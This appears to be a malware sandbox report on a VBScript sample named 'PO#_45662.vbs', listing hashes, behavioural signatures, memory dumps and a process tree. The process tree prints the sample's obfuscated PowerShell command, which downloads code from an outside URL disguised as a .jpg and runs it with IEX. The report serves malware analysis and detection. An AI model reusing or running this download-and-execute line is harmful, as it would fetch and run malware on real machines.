Analysis
-
max time kernel
120s -
max time network
129s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
23-10-2021 05:53
Static task
static1
Behavioral task
behavioral1
Sample
PO#_45662.vbs
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
PO#_45662.vbs
Resource
win10-en-20210920
windows10_x64
0 signatures
0 seconds
General
-
Target
PO#_45662.vbs
-
Size
15KB
-
MD5
90161e1c823ccc2e151d0828a801d035
-
SHA1
3e7ca03445260eb094f4d3a5506ff953d7405d8c
-
SHA256
4ec13434944f4989f27c29121d433ada8363059c6e20a3828792a06c4171a60b
-
SHA512
cec2bacfdb81dd93a7a8f4a41444cca5be2439fff5575deff9700a09fac01b40b2394fbc995f2d1987c61668851c919586514f124a3fd396c076cab0c69fe62f
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 856 powershell.exe 6 856 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 856 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 524 wrote to memory of 856 524 WScript.exe powershell.exe PID 524 wrote to memory of 856 524 WScript.exe powershell.exe PID 524 wrote to memory of 856 524 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO#_45662.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://lacombaphotography.com/update/0/UP.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/524-54-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmpFilesize
8KB
-
memory/856-55-0x0000000000000000-mapping.dmp
-
memory/856-57-0x000007FEF26D0000-0x000007FEF322D000-memory.dmpFilesize
11.4MB
-
memory/856-59-0x0000000002922000-0x0000000002924000-memory.dmpFilesize
8KB
-
memory/856-58-0x0000000002920000-0x0000000002922000-memory.dmpFilesize
8KB
-
memory/856-60-0x0000000002924000-0x0000000002927000-memory.dmpFilesize
12KB
-
memory/856-61-0x000000001B790000-0x000000001BA8F000-memory.dmpFilesize
3.0MB
-
memory/856-62-0x000000000292B000-0x000000000294A000-memory.dmpFilesize
124KB